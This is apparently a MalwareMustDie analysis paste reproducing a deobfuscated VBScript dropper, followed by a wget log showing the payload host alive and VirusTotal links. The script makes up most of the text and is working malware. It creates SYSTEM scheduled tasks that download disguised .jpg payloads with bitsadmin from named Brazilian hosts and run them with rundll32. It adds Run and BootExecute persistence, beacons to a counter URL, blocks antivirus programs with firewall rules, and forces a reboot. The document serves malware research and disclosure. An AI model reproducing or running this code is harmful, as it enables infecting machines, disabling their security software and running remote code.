set MyFileAndOSverOK = MyFileSysObject.CreateTextFile(MyUserName & "\qXfWln92f", 2, true)
MyFileAndOSverOK.Close
 
 
'....:ARQUIVO RRI:....'
MyMalicious1.Run("cmd /c echo RR>> ""%SYSTEMROOT%\%COMPUTERNAME%_Part."&"r"&"r"&"i"""),0,True
 
'....:VARIAVEIS:....'
MyMalicious1.Run("cmd /c setx.exe UPLKVARIABLE ""http://brcentermodelo.com.br/arquivos/up.jpg"" /M"),0,True
MyMalicious1.Run("cmd /c setx.exe upvariable %RANDOM% /M"),0,True
 
'....:AVISAR:....'
MyMalicious1.Run("cmd /c reg query HKLM\SYSTEM\ControlSet001\Services\G"&"b"&"p"&"S"&"v" & _
" &&schtasks /CREATE /F /SC ONCE /ST " & FormatDateTime(DateAdd("n", 2, Now()),4) & " /TN ""{7EFA8D58-0B08-4116-8756-25A3F28BE29B}4"" /TR ""cmd /c schtasks /DELETE /TN ""{7EFA8D58-0B08-4116-8756-25A3F28BE29B}4"" /F &start ' ' """"http://martinstranns.com.br/contador/cnt.php?url=[Plugin][%COMPUTERNAME%]-cn-"""""" /RU SYSTEM" & _
" ||schtasks /CREATE /F /SC ONCE /ST " & FormatDateTime(DateAdd("n", 2, Now()),4) & " /TN ""{7EFA8D58-0B08-4116-8756-25A3F28BE29B}4"" /TR ""cmd /c schtasks /DELETE /TN ""{7EFA8D58-0B08-4116-8756-25A3F28BE29B}4"" /F &start ' ' """"http://martinstranns.com.br/contador/cnt.php?url=[N/A][%COMPUTERNAME%]-cn-"""""" /RU SYSTEM"),0,True
 
'....:UPDATE:....'
MyMalicious1.Run("cmd /c schtasks /CREATE /F /SC ONSTART /DELAY 0009:00 /TN ""{7EFA8D58-0B08-4116-8756-25A3F28BE29B}"" " & _
"/TR ""cmd /c bitsadmin /transfer t%RANDOM% /Download /PRIORITY HIGH %UPLKVARIABLE% %SYSTEMROOT%\%upvariable%.tmp" & _
" &rundll32.exe %SYSTEMROOT%\%upvariable%.tmp,#1"" /RU SYSTEM"),0,True
 
'....:REINI:....'
MyMalicious1.Run("cmd /c schtasks /CREATE /F /SC ONCE /ST " & FormatDateTime(DateAdd("n", 14, Now()),4) & _
" /TN ""{7EFA8D58-0B08-4116-8756-25A3F28BE29B}3"" /TR ""cmd /c schtasks /DELETE /TN ""{7EFA8D58-0B08-4116-8756-25A3F28BE29B}3"" /F &shutdown /r /t 60 /f"" /RU SYSTEM"),0,True
'....:KL:....'
MyMalicious1.Run("cmd /c schtasks /CREATE /F /SC ONCE /ST " & FormatDateTime(DateAdd("n", 4, Now()),4) & _
" /TN ""{7EFA8D58-0B08-4116-8756-25A3F28BE29B}1"" /TR ""cmd /c bitsadmin /transfer k%RANDOM% /Download /PRIORITY HIGH ""http://brcentermodelo.com.br/arquivos/host.jpg"" ""%SYSTEMROOT%\%COMPUTERNAME%.tmp""" & _
" &schtasks /DELETE /TN ""{7EFA8D58-0B08-4116-8756-25A3F28BE29B}1"" /F &echo 10032> ""%SYSTEMROOT%\%upvariable%"""" /RU SYSTEM" & _
" &&reg.exe ADD ""HKLM\Software\Microsoft\Windows\CurrentVersion\Run"" /v %COMPUTERNAME% /t REG_SZ /d ""rundll32 %SYSTEMROOT%\%COMPUTERNAME%.tmp,#1"" /F"),0,True
 
'....:PART:....'
MyMalicious1.Run("cmd /c reg.exe ADD ""HKLM\SYSTEM\CurrentControlSet\Control\Partizan"" /v HideWelcomeMessage /t REG_DWORD /d 2 /F"),0,True
MyMalicious1.Run("cmd /c schtasks /CREATE /F /SC ONCE /ST " & FormatDateTime(DateAdd("n", 3, Now()),4) & _
" /TN ""{7EFA8D58-0B08-4116-8756-25A3F28BE29B}2"" /TR ""cmd /c bitsadmin /transfer p%RANDOM% /Download /PRIORITY HIGH ""http://brcentermodelo.com.br/arquivos/part.jpg"" ""%SYSTEMROOT%\%COMPUTERNAME%_Part.exe"" &schtasks /DELETE /F /TN ""{7EFA8D58-0B08-4116-8756-25A3F28BE29B}2"""" /RU SYSTEM" & _
" &reg.exe ADD ""HKLM\SYSTEM\CurrentControlSet\Control\Session Manager"" /v BootExecute /t REG_MULTI_SZ /d ""autocheck autochk *\0 \0%SYSTEMROOT%\%COMPUTERNAME%_Part.exe\0"" /F"),0,True
 
'*********ANTIVITUS*********'
var1()
Function var2(var3)
   For MyCount = Len(var3) To 1 Step -1
      If Mid(var3, MyCount, 1) = "\" Then Exit For
   Next
   var2 = Left (var3, MyCount - 1)
End Function
 
Sub Myevasion(MyMalicious2)
    For Each MyCount2 in MyMalicious2.SubFolders
        Set MyPath = MyFileSysObject.GetFolder(MyCount2.Path)
        Set MyPayload = MyPath.Files
        for each MyFileData in MyPayload
            if LCase(InStr(1,MyFileData, ".exe")) > 1 then
                                     MyMalicious1.Run("cmd /c netsh advfirewall firewall add rule name=""" & MyFileSysObject.GetFileName(MyFileData) & """ dir=in action=block program=""" & MyFileData & """ enable=yes"),0,True
                                     MyMalicious1.Run("cmd /c echo \??\" & MyFileData & ">> %SYSTEMROOT%\%COMPUTERNAME%_Part"&"."&"r"&"r"&"i"),0,True
                                     MyMalicious1.Run("cmd /c netsh advfirewall firewall add rule name=""" & MyFileSysObject.GetFileName(MyFileData) & """ dir=out action=block program=""" & MyFileData & """ enable=yes"),0,True
                               End If
        Next
        Myevasion MyCount2
    Next
End Sub
 
Function var1()
        MyProgFile = MyMalicious1.ExpandEnvironmentStrings("%PROGRAMFILES(X86)%")
        MyProgFile2 = MyMalicious1.ExpandEnvironmentStrings("%PROGRAMFILES%")
        Set MySecCenter = GetObject("winmgmts:\\.\root\SecurityCenter2")
        Set MySecCenterSELECT = MySecCenter.ExecQuery("Select * from A" & "n" & "t" & "i" & "V" & "i" & "r" & "u" & "s" & "P" & "r" & "o" & "d" & "u" & "c" & "t")
        For Each MyCount3 in MySecCenterSELECT
          With MyCount3
                MyrealPATH = var2(.pathToSignedProductExe)
                MyrealPATH = Replace(MyrealPATH,"%ProgramFiles(x86)%",MyProgFile)
                MyrealPATH = Replace(MyrealPATH,"%ProgramFiles%",MyProgFile2)
                set MyPath = MyFileSysObject.GetFolder(MyrealPATH)
               
                set MyPayload = MyPath.Files
               
                For Each MyrealPAYLOAD in MyPayload
                        MyrealPAYLOADNAME = MyrealPAYLOAD.Name
                        If MyFileSysObject.GetExtensionName(MyrealPAYLOADNAME) = "exe" Then
                                MyMalicious1.Run("cmd /c netsh adv" & "f" & "i" & "r" & "e" & "w" & "a" & "l" & "l firewall add rule name=""" & MyrealPAYLOAD.Name & """ dir=in action=block program=""" & MyrealPATH & "\" & MyrealPAYLOAD.Name & """ enable=yes"),0,True
                                MyMalicious1.Run("cmd /c echo \??\" & MyrealPATH & "\" & MyrealPAYLOAD.Name & ">> %SYSTEMROOT%\%COMPUTERNAME%_Par"&"t"&"."&"r"&"r"&"i"),0,True
                                MyMalicious1.Run("cmd /c netsh a" & "d" & "v" & "f" & "i" & "r" & "e" & "w" & "a" & "l" & "l f" & "i" & "r" & "e" & "w" & "a" & "l" & "l add rule name=""" & MyrealPAYLOAD.Name & """ dir=out action=block program=""" & MyrealPATH & "\" & MyrealPAYLOAD.Name & """ enable=yes"),0,True
                        End If
                Next
                Myevasion MyFileSysObject.GetFolder(MyrealPATH)
          End With
        Next
    MyNoError = DTSTaskExecResult_Success
End Function
 
 
// alive PoC:
 
Resolving brcentermodelo.com.br (brcentermodelo.com.br)... 52.8.51.135
Connecting to brcentermodelo.com.br (brcentermodelo.com.br)|52.8.51.135|:80... connected.
HTTP/1.0 GET /arquivos/up.jpg request sent, awaiting response... 200 OK
Length: 45568 (44K) [image/jpeg]
Saving to: './sample'
./sample     100%[=====>]  44.50K   213KB/s   in 0.2s
2015-08-13 16:15:17 (213 KB/s) - './sample' saved [45568/45568]
 
Resolving martinstranns.com.br (martinstranns.com.br)... 52.8.140.254
Connecting to martinstranns.com.br (martinstranns.com.br)|52.8.140.254|:80... connected.
HTTP request sent, awaiting response... 403 Forbidden
2015-08-13 16:29:14 ERROR 403: Forbidden.
 
// VT samples:
virustotal.com/en/file/8538c78539832eaf25550bdf0ab1a9f9f004459af0208cf4d047aa41dfb6f260/analysis/1439451647/ ... https://www.virustotal.com/en/file/2fba569d0875dea7724285d61f792e28a67a2707772beb33749e4be5931ec82c/analysis/1439451661/ ... https://www.virustotal.com/en/file/1c14e870a9420d9c18b6caf8f44964ec07fa87f14b896fce50c043a8cb9b5439/analysis/ ... https://www.virustotal.com/en/file/ce96958d91aa1e900f7c73d0ffe35feffee8678e5adfd240f7fbf160f262a1b7/analysis/1439451732/ ...
 
 
#--
#MalwareMustDie!!